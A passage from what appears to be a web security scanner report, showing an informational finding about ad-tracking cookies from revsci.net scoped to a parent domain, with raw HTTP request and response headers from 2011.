Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_VOiH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5DmhOQIMpzaB+ObIF/jP48EwcK1Pyjh1wToaxEY4MjPMAO+jEloOaeT+ClCZ8K45ygDTnjxwhq94NMNJq4Tcgas5n0NcPxVe97USo2pI1WIn4fNAZflkljVTFLMsGkDx3k7kPxSQ3uOH6E9DvqTJPQbXrXf2QP7Wq6hvgKCr69qwau1c1vbiVuzmKuX7y/N4V0bvZdiH8G2o6T0Z7JxaMyHOg5nEBqR8PIMVDM0fSVf5inkYhUyohUdQNSuLfHBKN2LnPDbLmbgHUpsRY9osDH1pVwXa1AHE8X63tgamDWicqxrlQvzssnWXDFilrD8XCM934PPpi0pHam4Yq1lJiQpKf5LKH9PGgszbgyu9neXj34GCfr6l1hGw2dYRPgCuug6mhyBWRUnadaavpk38mvGPL9qqRawnWmvg8aCwuMe0rasvuUpiskX1GlTgIfOz60o4ZdNsgisT5YYrZGWrioBH4Du7MJzXhOhp9u985+cyw7ALihpZcXaxyg5JuBdxcaJS4kFDmmsvWhkemOvM9TnhVQ97g3+qcjI=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
Set-Cookie: rtc_IiAg=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:12:31 GMT

12.29. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; 